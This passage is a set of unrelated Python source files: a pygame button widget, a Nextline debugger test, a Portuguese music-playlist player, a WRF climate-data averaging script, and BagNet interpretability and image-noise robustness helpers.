        self.unPressedImage = pygame.image.load(resourceRoot + "/resources/images/button.png").convert().copy()
        self.pressedImage = pygame.image.load(resourceRoot + "/resources/images/activeButton.png").convert().copy()
        self.collisionArea = self.unPressedImage.get_rect(center=position)

        labelSurface = labelFont.render(label, 1, (255, 0, 0))
        labelWidth, labelHeight = labelFont.size(label)
        labelPos = [self.collisionArea[2] / 2.0 - labelWidth / 2.0,
                    self.collisionArea[3] / 2.0 - labelHeight / 2.0,
                    labelWidth, labelHeight]
        self.unPressedImage.blit(labelSurface, labelPos)
        self.pressedImage.blit(labelSurface, labelPos)

        self.value = value
        self.playPressedSound = False
        # White is treated as transparent on both surfaces.
        self.pressedImage.set_colorkey((255, 255, 255))
        self.unPressedImage.set_colorkey((255, 255, 255))

    def draw(self):
        """Return the surface for the current hover state, playing the
        sound once each time the pointer enters the button."""
        mouseX, mouseY = pygame.mouse.get_pos()
        if self.collisionArea.collidepoint(mouseX, mouseY):
            if self.playPressedSound:
                self.buttonSoundChannel.play(self.buttonSound)
                self.playPressedSound = False
            return self.pressedImage
        # Pointer is off the button: arm the sound for the next hover.
        self.playPressedSound = True
        return self.unPressedImage

    def testMouseCollision(self):
        """Return this button's value if the pointer is over it, else 0."""
        mouseX, mouseY = pygame.mouse.get_pos()
        return self.value if self.collisionArea.collidepoint(mouseX, mouseY) else 0
|
import sys
import asyncio
import threading
from pathlib import Path
import asyncio
import time
import pytest
from nextline import Nextline
##__________________________________________________________________||
# Source executed by Nextline under pdb control: it imports and runs the
# sibling `script` module (made importable by the autouse syspath fixture).
statement = """
import script
script.run()
""".strip()
##__________________________________________________________________||
@pytest.fixture(autouse=True)
def monkey_patch_syspath(monkeypatch):
    """Prepend this test's directory to sys.path so `import script` works."""
    this_dir = Path(__file__).resolve().parent
    monkeypatch.syspath_prepend(str(this_dir))
    yield
##__________________________________________________________________||
async def monitor_global_state(nextline):
    """Print every global-state transition that Nextline publishes."""
    async for s in nextline.subscribe_global_state():
        print(s)
async def control_execution(nextline):
    """Keep one controller task per live thread/async-task id.

    Spawns a control_thread_task for each newly seen id and forgets
    controllers whose id disappeared (the task object is dropped, not
    cancelled).
    """
    controllers = {}
    async for current_ids in nextline.subscribe_thread_asynctask_ids():
        known = list(controllers)
        # Start a controller for every id we have not seen yet.
        for tid in current_ids:
            if tid not in known:
                controllers[tid] = asyncio.create_task(
                    control_thread_task(nextline, tid))
        # Drop entries for ids that are no longer reported.
        for tid in known:
            if tid not in current_ids:
                del controllers[tid]
async def control_thread_task(nextline, thread_task_id):
    """Auto-step one thread/task: send 'next' whenever pdb is prompting."""
    print(thread_task_id)
    async for s in nextline.subscribe_thread_asynctask_state(thread_task_id):
        print(s)
        if s['prompting']:
            nextline.send_pdb_command(thread_task_id, 'next')
##__________________________________________________________________||
@pytest.mark.asyncio
async def test_run():
    """End-to-end: run the statement under Nextline while auto-stepping it."""
    nextline = Nextline(statement)
    assert nextline.global_state == 'initialized'

    # Background tasks: one prints state changes, one answers pdb prompts
    # so the run can progress to completion without manual input.
    task_monitor_global_state = asyncio.create_task(monitor_global_state(nextline))
    # await asyncio.sleep(0)
    task_control_execution = asyncio.create_task(control_execution(nextline))

    nextline.run()
    await nextline.finish()
    assert nextline.global_state == 'finished'
    await nextline.close()
    assert nextline.global_state == 'closed'
##__________________________________________________________________||
|
import pygame
def lePlaylistDeArquivo(NomeArq):
    """Read a playlist file: one '#'-separated [band, song, genre] row per line.

    Returns a list of lists, one per non-stripped line of the file.
    """
    linhas = []
    # Bug fix: the original called `arquivo.close` without parentheses, so
    # the file handle was never actually closed; `with` guarantees it.
    with open(NomeArq, 'r') as arquivo:
        for linha in arquivo:
            linhas.append(linha.strip().split('#'))
    return linhas
def listar_playlist(playlist):
    """Print band, song and genre for every entry of the playlist."""
    for entrada in playlist:
        print(f'Banda: {entrada[0]} Música: {entrada[1]} Gênero: {entrada[2]}')
def pesquisa_musica_por_genero(genero_pesq, playlist=None):
    """Print (and return) the song names whose genre equals *genero_pesq*.

    ``playlist`` defaults to the module-level global so existing callers
    keep working; passing it explicitly makes the function reusable and
    testable. Each entry is [band, song, genre]. Returns the list of
    matching song names (previously the function returned None, so the
    new return value is backward compatible).
    """
    if playlist is None:
        # Preserve the original behaviour of reading the module global.
        playlist = globals()['playlist']
    encontradas = []
    for msc in playlist:
        if msc[2] == genero_pesq:
            print(f'{msc [1]}')
            encontradas.append(msc[1])
    return encontradas
def tocar_musica_playlist(musica_tocar):
    """Load and start playing the given music file with pygame's mixer.

    Bug fix: ``pygame.mixer.music.play`` takes a loop count (int), not a
    file name — the original passed the file name and raised a TypeError.
    """
    pygame.mixer.music.load(musica_tocar)
    pygame.mixer.music.play()
# --- Interactive player: play one song, then offer pause/resume/swap/quit ---
print('='*30)
print("Inicio do Player de Músicas")
print("="*30)
pygame.mixer.init()
musica = input('nome da musica:')
nomealterado = musica + '.mp3'
pygame.mixer.music.load(nomealterado)
pygame.mixer.music.play()
while True:
    opcoes_playlist = int(input('Digite uma opção:\n1.Aperte para pausar\n2.Aperte para retomar\n3.Aperte para trocar a música\n4.Aperte para sair'))
    if (opcoes_playlist == 1):
        pygame.mixer.music.pause()
    elif (opcoes_playlist == 2):
        pygame.mixer.music.unpause()
    elif (opcoes_playlist == 3):
        msc_tocar = input('Digite o nome da música')
        pygame.mixer.music.stop()
        # Bug fix: the original reloaded `nomealterado` (the first song),
        # ignoring the song the user just asked for.
        nomealterado = msc_tocar + '.mp3'
        pygame.mixer.music.load(nomealterado)
        pygame.mixer.music.play()
    elif (opcoes_playlist == 4):
        print('fim')
        break
#PROGRAMA PRINCIPAL
playlist = lePlaylistDeArquivo('playlistMusicas.txt')
numColunas = len(playlist[0])
numLinhas = len(playlist)
print(numColunas)
acabou = False
# Bug fix: `acabou` was never set to True, so this loop could not end.
# A new menu option 5 ("Sair") now terminates the program cleanly.
while (acabou == False):
    opcao = int(input('Digite uma opção:\n1.Listar músicas da playlist\n2.Pesquisar música por gênero\n3.Cadastrar música\n4.Tocar uma música\n5.Sair\n'))
    if (opcao == 1):
        listar_playlist(playlist)
    elif (opcao == 2):
        genero_pesq = input('Qual o gênero a pesquisar?')
        pesquisa_musica_por_genero(genero_pesq)
    elif (opcao == 3):
        banda = input('Digite o nome da banda\n')
        msc = input('Digite o nome da música\n')
        genero = input('Digite o gênero da música')
        lista = [banda, msc, genero]
        playlist.append(lista)
    elif (opcao == 4):
        play1 = input('Digite o nome da música que você deseja ouvir')
        play2 = play1 + '.mp3'
        tocar_musica_playlist(play2)
    elif (opcao == 5):
        acabou = True
# Create yearly and monthly mean files for chosen vars
import sys
import numpy as np
import pandas as pd
from netCDF4 import Dataset
import xarray as xr
import dask
from dask.diagnostics import ProgressBar
import os, fnmatch
from resource import *
#import matplotlib.pyplot as plt
import calendar
import plot_maps3

# Silence dask's large-chunk warnings when slicing.
dask.config.set(**{'array.slicing.split_large_chunks': False})

# Command line: <year> <period>; period selects the simulation directory.
y = sys.argv[1]
y = int(y)
period = sys.argv[2]
plot = False
#matplotlib.use('Agg') # To not open a plot window
domain = 'd02'
#varlist = list(['T','RR','RH','QCLOUD','QRAIN','QSNOW','QGRAUP','QVAPOR','zerocross'])
#varlist = list(['QCLOUD','QRAIN','QSNOW','QGRAUP'])
#varlist = list(['SR','rr','RH','QVAPOR'])
varlist = list(['QVAPOR'])
# Month character classes for the filename patterns in the main loop:
# '1[012]' matches Oct-Dec of year y, '0[1234]' matches Jan-Apr of y+1.
m1 = '012' # '1[%s]' %mnt1
m2 = '1234'
#Dirs
if period == 'warm':
    dirr = '/mnt/elephant/WRFsimulations/ICEBOX_PGW'
elif period == 'past':
    dirr = '/mnt/elephant/WRFsimulations/KVT_NSF02'
wrfdir = ('%s/archive2/postpost' %dirr)
outdir = ('./files/%s' %period)
figdir = ('./figures')
########### The main routine ##################
# Collect the cold-season files (Oct-Dec of year y plus Jan-Apr of y+1),
# open them lazily with dask-backed xarray and concatenate along Time.
listOfFiles = os.listdir(wrfdir)
listOfFiles.sort()
i=0
for entry in listOfFiles:
    if fnmatch.fnmatch(entry,'wrfout_%s_%i-1[%s].nc4' %(domain,y,m1)) \
       or fnmatch.fnmatch(entry,'wrfout_%s_%i-0[%s].nc4' %(domain,y+1,m2)):
        i=i+1
        wrf1 = xr.open_mfdataset('%s/%s' %(wrfdir,entry), drop_variables={'T','XTIME'},\
            chunks={'Time':720, 'bottom_top':10, 'south_north': 32, 'west_east': 32,\
            'soil_layers_stag':4, 'bottom_top_stag':10, 'west_east_stag':32, 'south_north_stag':32})
        # Keep only the lowest 10 model levels.
        wrf1 = wrf1.sel(bottom_top=slice(0,10),bottom_top_stag=slice(0,10))
        if i==1:
            wrf = wrf1
        else:
            wrf = xr.concat([wrf,wrf1], dim="Time")
# Use the dataset's 'times' variable as the Time coordinate for groupby.
wrf = wrf.assign_coords(Time=wrf.times)
for v in varlist:
    if v == 'T':
        # Monthly mean temperature in Celsius.
        T = wrf['TEMPERATURE']-273
        T.attrs['units'] = 'C'
        T = T.groupby('Time.month').mean('Time')
        #T.to_netcdf('%s/%i_%s_T_mean.nc' %(outdir,y,period))
        delayed_obj = T.to_netcdf('%s/%i_%s_T_mean.nc' %(outdir,y,period), compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
    if v == 'RR':
        RR = wrf['RAINNC'].diff("Time") # Get hourly precip rate from accumulated time series
        RR = RR.groupby('Time.month').sum('Time')
        delayed_obj = RR.to_netcdf('%s/%i_%s_RR_sums.nc' %(outdir,y,period), compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
    if v == 'SR':
        SR = wrf['SNOWNC'].diff("Time") # Get hourly precip rate from accumulated time series
        SR = SR.groupby('Time.month').sum('Time')
        delayed_obj = SR.to_netcdf('%s/%i_%s_SR_sums.nc' %(outdir,y,period), compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
    if v == 'FF':
        # Monthly mean wind speed.
        FF = wrf['FF']
        FF = FF.groupby('Time.month').mean('Time')
        delayed_obj = FF.to_netcdf('%s/%i_%s_FF_mean.nc' %(outdir,y,period), compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
    if v == 'RH':
        # Relative humidity derived from temperature, pressure and QVAPOR.
        T = wrf['TEMPERATURE']
        P = wrf['PRESSURE']
        q = wrf['QVAPOR']
        RH = (0.263*P*q)/(np.exp((17.67*(T-273.15))/(T-29.65)))
        RH.attrs['description'] = 'Relative humidity'
        RH.attrs['units'] = '%'
        RH = RH.groupby('Time.month').mean('Time')
        delayed_obj = RH.to_netcdf('%s/%i_%s_RH_mean.nc' %(outdir,y,period), compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
    if 'Q' in v:
        # Monthly sums of the selected moisture/hydrometeor variable.
        #qvar = cloud_water(wrf,v) # Convert to kg/m3
        qvar = wrf[v]
        qvar = qvar.groupby('Time.month').sum('Time')
        delayed_obj = qvar.to_netcdf('%s/%i_%s_%s_sums.nc' %(outdir,y,period,v),compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
    if v == 'P':
        P = wrf['PRESSURE']
        P = P.groupby('Time.month').mean('Time')
        delayed_obj = P.to_netcdf('%s/%i_%s_P_mean.nc' %(outdir,y,period), compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
    if v == 'Z':
        try:
            Z = wrf['Z']
        except:
            # Fall back to deriving height from pressure and temperature.
            g = 9.81
            P = wrf['PRESSURE']
            T = wrf['TEMPERATURE']
            # NOTE(review): standard sea-level pressure is 101325 Pa —
            # confirm this value (10132500) matches the PRESSURE units.
            P0 = 10132500
            R = 8.3143
            M = 0.02896
            # NOTE(review): the hypsometric equation uses log(P/P0), not
            # exp(P/P0) — verify this derivation before trusting 'Z'.
            Z = -((R*T)/(M*g))*np.exp(P/P0)
        Z.attrs['description'] = 'Height'
        Z.attrs['units'] = 'm'
        Z = Z.groupby('Time.month').mean('Time')
        delayed_obj = Z.to_netcdf('%s/%i_%s_H_mean.nc' %(outdir,y,period), compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
    if v == 'zerocross':
        # Count hours where the lowest-level temperature rises to exactly 0 C.
        T = wrf['TEMPERATURE'][:,0]-273
        Tdiff = T.diff("Time",label='upper')
        T = T[1:]
        da = xr.full_like(T,fill_value=0)
        mask = ((Tdiff>0) & (T==0))
        da = xr.where(mask, 1, da)
        zerocross = da.groupby('Time.month').sum('Time')
        delayed_obj = zerocross.to_netcdf('%s/%i_%s_%s_sums.nc' %(outdir,y,period,v),compute=False)
        with ProgressBar():
            results = delayed_obj.compute()
##### Plotting #######
if plot:
    plot_maps3.plot_mnt_tots(varlist,y,period)
|
import numpy as np
import matplotlib.pyplot as plt
from skimage import feature, transform
from bagnets.pytorch import Bottleneck
from keras.preprocessing import image as KImage
import time
import torch
import torch.nn as nn
import math
import logging
from torch.utils import model_zoo
# Pre-trained BagNet weights. NOTE(review): the file names are offset by one
# from the keys (e.g. 'bagnet9' -> bagnet8-*.pth.tar); this appears to mirror
# the upstream repository's naming — confirm before renaming anything.
model_urls = {
    'bagnet9': 'https://bitbucket.org/wielandbrendel/bag-of-feature-pretrained-models/raw/249e8fa82c0913623a807d9d35eeab9da7dcc2a8/bagnet8-34f4ccd2.pth.tar',
    'bagnet17': 'https://bitbucket.org/wielandbrendel/bag-of-feature-pretrained-models/raw/249e8fa82c0913623a807d9d35eeab9da7dcc2a8/bagnet16-105524de.pth.tar',
    'bagnet33': 'https://bitbucket.org/wielandbrendel/bag-of-feature-pretrained-models/raw/249e8fa82c0913623a807d9d35eeab9da7dcc2a8/bagnet32-2ddd53ed.pth.tar',
}
def image_partition(seed, partition_size):
    """Shuffle the 50000 image indices (seeded) and split them into equal
    partitions of `partition_size` indices each.

    Returns a list of index arrays; `partition_size` must divide 50000.
    """
    np.random.seed(seed)
    indices = np.arange(50000)
    np.random.shuffle(indices)
    n_partitions = 50000 // partition_size
    return np.split(indices, n_partitions)
def plot_heatmap(heatmap, original, ax, cmap='RdBu_r',
                 percentile=99, dilation=0.5, alpha=0.25):
    """
    Plots the heatmap on top of the original image
    (which is shown by most important edges).

    Parameters
    ----------
    heatmap : Numpy Array of shape [X, X]
        Heatmap to visualise.
    original : Numpy array of shape [X, X, 3]
        Original image for which the heatmap was computed.
    ax : Matplotlib axis
        Axis onto which the heatmap should be plotted.
    cmap : Matplotlib color map
        Color map for the visualisation of the heatmaps (default: RdBu_r)
    percentile : float between 0 and 100 (default: 99)
        Extreme values outside of the percentile range are clipped.
        This avoids that a single outlier dominates the whole heatmap.
    dilation : float
        Resizing of the original image. Influences the edge detector and
        thus the image overlay.
    alpha : float in [0, 1]
        Opacity of the overlay image.
    """
    # Multi-channel heatmaps are collapsed to one channel by averaging.
    if len(heatmap.shape) == 3:
        heatmap = np.mean(heatmap, 0)
    dx, dy = 0.05, 0.05
    xx = np.arange(0.0, heatmap.shape[1], dx)
    yy = np.arange(0.0, heatmap.shape[0], dy)
    xmin, xmax, ymin, ymax = np.amin(xx), np.amax(xx), np.amin(yy), np.amax(yy)
    extent = xmin, xmax, ymin, ymax
    # NOTE(review): set_bad mutates a colormap object that matplotlib may
    # cache and share globally — confirm this side effect is acceptable.
    cmap_original = plt.get_cmap('Greys_r')
    cmap_original.set_bad(alpha=0)
    overlay = None
    if original is not None:
        # Compute edges (to overlay to heatmaps later)
        original_greyscale = original if len(original.shape) == 2 else np.mean(original, axis=-1)
        in_image_upscaled = transform.rescale(original_greyscale, dilation, mode='constant',
                                              multichannel=False, anti_aliasing=True)
        edges = feature.canny(in_image_upscaled).astype(float)
        edges[edges < 0.5] = np.nan
        # Blank a 5-pixel border so frame artifacts are not drawn as edges.
        edges[:5, :] = np.nan
        edges[-5:, :] = np.nan
        edges[:, :5] = np.nan
        edges[:, -5:] = np.nan
        overlay = edges
    # Symmetric colour scale around zero, clipped at the given percentile.
    abs_max = np.percentile(np.abs(heatmap), percentile)
    abs_min = abs_max
    ax.imshow(heatmap, extent=extent, interpolation='none', cmap=cmap, vmin=-abs_min, vmax=abs_max)
    if overlay is not None:
        ax.imshow(overlay, extent=extent, interpolation='none', cmap=cmap_original, alpha=alpha)
def generate_heatmap_pytorch(model, image, target, patchsize):
    """
    Generates high-resolution heatmap for a BagNet by decomposing the
    image into all possible patches and by computing the logits for
    each patch.

    Parameters
    ----------
    model : Pytorch Model
        This should be one of the BagNets.
    image : Numpy array of shape [1, 3, X, X]
        The image for which we want to compute the heatmap.
    target : int
        Class for which the heatmap is computed.
    patchsize : int
        The size of the receptive field of the given BagNet.
    """
    import torch
    with torch.no_grad():
        # pad with zeros
        _, c, x, y = image.shape
        padded_image = np.zeros((c, x + patchsize - 1, y + patchsize - 1))
        padded_image[:, (patchsize-1)//2:(patchsize-1)//2 + x, (patchsize-1)//2:(patchsize-1)//2 + y] = image[0]
        image = padded_image[None].astype(np.float32)
        # turn to torch tensor (requires a CUDA device)
        input = torch.from_numpy(image).cuda()
        # extract all patchsize x patchsize patches with stride 1
        patches = input.permute(0, 2, 3, 1)
        patches = patches.unfold(1, patchsize, 1).unfold(2, patchsize, 1)
        num_rows = patches.shape[1]
        num_cols = patches.shape[2]
        patches = patches.contiguous().view((-1, 3, patchsize, patchsize))
        # compute logits for each patch, in batches of 1000 to bound memory
        logits_list = []
        for batch_patches in torch.split(patches, 1000):
            logits = model(batch_patches)
            logits = logits[:, target][:, 0]
            logits_list.append(logits.data.cpu().numpy().copy())
        logits = np.hstack(logits_list)
        # NOTE(review): the output is hard-coded to 224x224 (ImageNet size);
        # num_rows/num_cols are computed but unused — confirm inputs are 224.
        return logits.reshape((224, 224))
##################################################
# Helper functions from 2019-5-22 notebook
# Reference: https://github.com/wielandbrendel/bag-of-local-features-models/blob/master/bagnets/utils.py
##################################################
def pad_image(image, patchsize):
    """Zero-pad a [1, C, H, W] image by (patchsize-1)//2 on each side.

    Returns a float32 array of shape [1, C, H+patchsize-1, W+patchsize-1]
    with the original image centred in the padded canvas.
    """
    _, channels, height, width = image.shape
    margin = (patchsize - 1) // 2
    canvas = np.zeros((channels, height + patchsize - 1, width + patchsize - 1))
    canvas[:, margin:margin + height, margin:margin + width] = image[0]
    return canvas[None].astype(np.float32)
def convert2channel_last(image):
    """Convert a channel-first (3, h, w) image to channel-last (h, w, 3)."""
    return np.transpose(image, (1, 2, 0))
def imagenet_preprocess(image):
    """Scale a (3, H, W) 0-255 image to [0, 1] and normalise each channel
    with the standard ImageNet per-channel mean and std."""
    mean = np.array([0.485, 0.456, 0.406])[:, None, None]
    std = np.array([0.229, 0.224, 0.225])[:, None, None]
    return (image / 255. - mean) / std
def extract_patches(image, patchsize, stride=1):
    """Slide a patchsize x patchsize window over a [N, C, H, W] tensor and
    return every window stacked as [num_patches, 3, patchsize, patchsize]."""
    channel_last = image.permute(0, 2, 3, 1)
    windows = channel_last.unfold(1, patchsize, stride)
    windows = windows.unfold(2, patchsize, stride)
    return windows.contiguous().view((-1, 3, patchsize, patchsize))
def bagnet_predict(model, images, k=1, clip=None, a=1e-2, b=-0.78, return_class=True):
    """ Make top-K prediction on IMAGES by MODEL
    Inputs:
    - model: pytorch model. model for prediction
    - images: pytorch tensor. images to be predicted on
    - k: number of classes to return for each image (top-k most possible ones)
    - clip (clipping): clipping function
    - a, b (double): clipping parameters
    - return_class: If True, then return classes as prediction; otherwise, return logits and probability of prediction classes
    Return:
    - indices.cpu().numpy(): numpy array at CPU. prediction K classes
    - l.cpu().numpy(): numpy array at CPU. top-K prediction logits
    - p.cpu().numpy(): numpy array at CPU. top-K prediction probability
    """
    with torch.no_grad():
        logits = model(images)
        if clip:
            # Clipping only makes sense on per-patch logits, i.e. a model
            # without internal average pooling; the patch logits are then
            # averaged over the two spatial dimensions after clipping.
            assert not model.avg_pool, 'Bagnet should apply clipping before taking average.'
            logits = clip(logits, a, b)
            logits = torch.mean(logits, dim=(1, 2))
        p = torch.nn.Softmax(dim=1)(logits)
        p, indices = torch.topk(p, k, dim=1)
        l, _ = torch.topk(logits, k, dim=1)
    if return_class:
        return indices.cpu().numpy()
    else:
        return l.cpu().numpy(), p.cpu().numpy()
def compare_heatmap(bagnet, patches, gt, target, original, batch_size=1000):
    """Plot side-by-side patch-logit heatmaps for the ground-truth class
    *gt* and an alternative class *target*, next to the original image.

    `patches` are fed through the bagnet in batches of `batch_size`;
    `original` is expected as [1, 3, H, W] in the 0-255 range.
    """
    with torch.no_grad():
        gt_logits_list, target_logits_list = [], []
        for batch_patches in torch.split(patches, batch_size):
            logits = bagnet(batch_patches)
            gt_logits = logits[:, gt][:, 0]
            target_logits = logits[:, target][:, 0]
            gt_logits_list.append(gt_logits.data.cpu().numpy().copy())
            target_logits_list.append(target_logits.data.cpu().numpy().copy())
        gt_logits = np.hstack(gt_logits_list)
        target_logits = np.hstack(target_logits_list)
        # Assumes 224x224 inputs (one logit per pixel) — TODO confirm.
        gt_heatmap = gt_logits.reshape((224, 224))
        target_heatmap = target_logits.reshape((224, 224))
    fig = plt.figure(figsize=(8, 4))
    original_image = original[0].transpose([1, 2, 0])
    ax = plt.subplot(131)
    ax.set_title('original')
    plt.imshow(original_image / 255.)
    plt.axis('off')
    ax = plt.subplot(132)
    ax.set_title('ground true class')
    plot_heatmap(gt_heatmap, original_image, ax, dilation=0.5, percentile=99, alpha=0.25)
    plt.axis('off')
    ax = plt.subplot(133)
    ax.set_title('target class')
    plot_heatmap(target_heatmap, original_image, ax, dilation=0.5, percentile=99, alpha=0.25)
    plt.axis('off')
    plt.show()
###################################################
###################################################
# Helper functions from 2019-5-23 notebook
###################################################
def class_patch_logits(bagnet, patches, device, batch_size=1000, num_classes=1000):
    """ Obtain the logits of all the classes across all the patches
    """
    logits_list = []
    with torch.no_grad():
        for batch_patches in torch.split(patches, batch_size):
            logits = bagnet(batch_patches)
            for i in range(num_classes):
                class_logits = logits[:, i]
                logits_list.append(class_logits.data.cpu().numpy().copy())
    # NOTE(review): with more than one batch the concatenation interleaves
    # (batch, class) groups rather than grouping all patches per class —
    # confirm callers only pass a single batch or reorder accordingly.
    return np.hstack(logits_list)
###################################################
###################################################
# Helper functions from 2019-5-24 notebook
###################################################
def attack_patch(image, patchsize, num_patches, seed=None):
    """Overwrite `num_patches` randomly placed square regions of a (C, H, W)
    image with uniform [0, 1) noise, in place, and return the image.

    Patch centres are drawn uniformly; regions near the border may be
    clipped (or empty) because the slice bounds are not clamped.
    """
    channels, height, width = image.shape
    if seed is not None:
        np.random.seed(seed)
    rows = np.random.choice(range(height), size=num_patches, replace=True)
    cols = np.random.choice(range(width), size=num_patches, replace=True)
    half = (patchsize - 1) // 2
    for r, c in zip(rows, cols):
        region = image[:, (r - half):(r + half), (c - half):(c + half)]
        image[:, (r - half):(r + half), (c - half):(c + half)] = np.random.rand(*region.shape)
    return image
###################################################
###################################################
# Helper function from 5-26 notebook
###################################################
def compute_saliency_map(images, labels, model, criterion, device):
    """Compute a vanilla-gradient saliency map (max |grad| over channels),
    following the description in https://arxiv.org/abs/1312.6034

    Input:
    - images (numpy array): images
    - labels (numpy array): labels
    - model (pytorch model): model
    - criterion (pytorch loss function): loss function to compute gradients
    - device: context
    Output:
    - saliency (numpy array): saliency map
    """
    inputs = torch.from_numpy(images).to(device)
    targets = torch.from_numpy(labels).to(device)
    # Gradients are taken w.r.t. the input pixels, not the model weights.
    inputs.requires_grad_(True)
    loss = criterion(model(inputs), targets)
    loss.backward()
    grads = inputs.grad.cpu().numpy()
    return np.amax(np.absolute(grads), axis=1)
def plot_saliency(images, saliency, alpha=0):
    """Plot saliency map
    Input:
    - images (numpy array): images
    - saliency (numpy array): saliency map
    - alpha (float): transparency
    """
    # One figure per image: original on the left, saliency on the right.
    for i in range(len(saliency)):
        fig = plt.figure(figsize=(8, 4))
        ax = plt.subplot(121)
        ax.set_title('original')
        plt.imshow(convert2channel_last(images[i]))
        plt.axis('off')
        ax = plt.subplot(122)
        ax.set_title('saliency map')
        plt.imshow((saliency[i]), cmap=plt.cm.hot)
        if alpha:
            # Optionally blend the original image over the saliency map.
            plt.imshow(convert2channel_last(images[i]), alpha=alpha)
        plt.axis('off')
        plt.show()
class BottleneckDebug(nn.Module):
    """Bottleneck block with shape-tracing prints for debugging BagNets.

    Unlike a standard ResNet bottleneck, conv2 uses padding=0, so the
    spatial size can shrink; the residual is cropped to match when needed.
    """
    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None, kernel_size=1):
        super(BottleneckDebug, self).__init__()
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=kernel_size, stride=stride,
                               padding=0, bias=False) # changed padding from (kernel_size - 1) // 2
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(planes * 4)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x, **kwargs):
        residual = x

        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)

        out = self.conv2(out)
        out = self.bn2(out)
        out = self.relu(out)

        out = self.conv3(out)
        out = self.bn3(out)

        if self.downsample is not None:
            print('Bottleneck: shape before downsampling {}'.format(x.shape))
            residual = self.downsample(x)

        # conv2 has no padding, so `out` may be spatially smaller than the
        # residual; crop the residual's trailing rows/cols to align them.
        if residual.size(-1) != out.size(-1):
            print('Bottleneck: shape after downsampling {}'.format(residual.shape))
            print('Bottleneck: shape of out {}'.format(out.shape))
            diff = residual.size(-1) - out.size(-1)
            residual = residual[:,:,:-diff,:-diff]

        out += residual
        out = self.relu(out)

        return out
class BagNetDebug(nn.Module):
    """BagNet backbone with shape-tracing prints after every stage.

    With avg_pool=True forward returns (N, num_classes) logits; otherwise
    it returns per-patch logits of shape (N, H, W, num_classes).
    """

    def __init__(self, block, layers, strides=[1, 2, 2, 2], kernel3=[0, 0, 0, 0], num_classes=1000, avg_pool=True):
        self.inplanes = 64
        super(BagNetDebug, self).__init__()
        self.conv1 = nn.Conv2d(3, 64, kernel_size=1, stride=1, padding=0,
                               bias=False)
        self.conv2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=0,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64, momentum=0.001)
        self.relu = nn.ReLU(inplace=True)
        self.layer1 = self._make_layer(block, 64, layers[0], stride=strides[0], kernel3=kernel3[0], prefix='layer1')
        self.layer2 = self._make_layer(block, 128, layers[1], stride=strides[1], kernel3=kernel3[1], prefix='layer2')
        self.layer3 = self._make_layer(block, 256, layers[2], stride=strides[2], kernel3=kernel3[2], prefix='layer3')
        self.layer4 = self._make_layer(block, 512, layers[3], stride=strides[3], kernel3=kernel3[3], prefix='layer4')
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        self.avg_pool = avg_pool
        self.block = block

        # He initialisation for convolutions; unit/zero init for batchnorm.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()

    def _make_layer(self, block, planes, blocks, stride=1, kernel3=0, prefix=''):
        """Stack `blocks` bottlenecks; only the first `kernel3` blocks use a
        3x3 conv (the rest 1x1), which bounds the receptive field."""
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        kernel = 1 if kernel3 == 0 else 3
        layers.append(block(self.inplanes, planes, stride, downsample, kernel_size=kernel))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            kernel = 1 if kernel3 <= i else 3
            layers.append(block(self.inplanes, planes, kernel_size=kernel))
        return nn.Sequential(*layers)

    def forward(self, x):
        x = self.conv1(x)
        print('BagNet: shape after conv1 {}\n'.format(x.shape))
        x = self.conv2(x)
        print('BagNet: shape after conv2 {}\n'.format(x.shape))
        x = self.bn1(x)
        x = self.relu(x)
        x = self.layer1(x)
        print('BagNet: shape after layer1 {}\n'.format(x.shape))
        x = self.layer2(x)
        print('BagNet: shape after layer2 {}\n'.format(x.shape))
        x = self.layer3(x)
        print('BagNet: shape after layer3 {}\n'.format(x.shape))
        x = self.layer4(x)
        print('BagNet: shape after layer4 {}\n'.format(x.shape))
        if self.avg_pool:
            # Pool over the full remaining spatial extent, then classify.
            print('BagNet: kernel size of AvgPool2d: {}'.format(x.size()[2]))
            x = nn.AvgPool2d(x.size()[2], stride=1)(x)
            x = x.view(x.size(0), -1)
            print('BagNet: shape after flattening: {}'.format(x.shape))
            x = self.fc(x)
            print('BagNet: shape of final output: {}'.format(x.shape))
        else:
            # Keep per-patch logits: move channels last and apply fc per
            # spatial position.
            print('BagNet: return logits of patches')
            x = x.permute(0,2,3,1)
            print('BagNet: shape after transpose: {}'.format(x.shape))
            x = self.fc(x)
            print('BagNet: shape of final output: {}'.format(x.shape))
        return x
def bagnet33_debug(pretrained=False, strides=[2, 2, 2, 1], **kwargs):
    """Constructs a Bagnet-33 model (Debugging mode).

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
    """
    net = BagNetDebug(BottleneckDebug, [3, 4, 6, 3], strides=strides,
                      kernel3=[1, 1, 1, 1], **kwargs)
    if pretrained:
        net.load_state_dict(model_zoo.load_url(model_urls['bagnet33']))
    return net
###################################################
###################################################
# Helper function from 5-27 notebook
###################################################
class BottleneckRF(nn.Module):
    """Bottleneck block variant used for the receptive-field experiments.

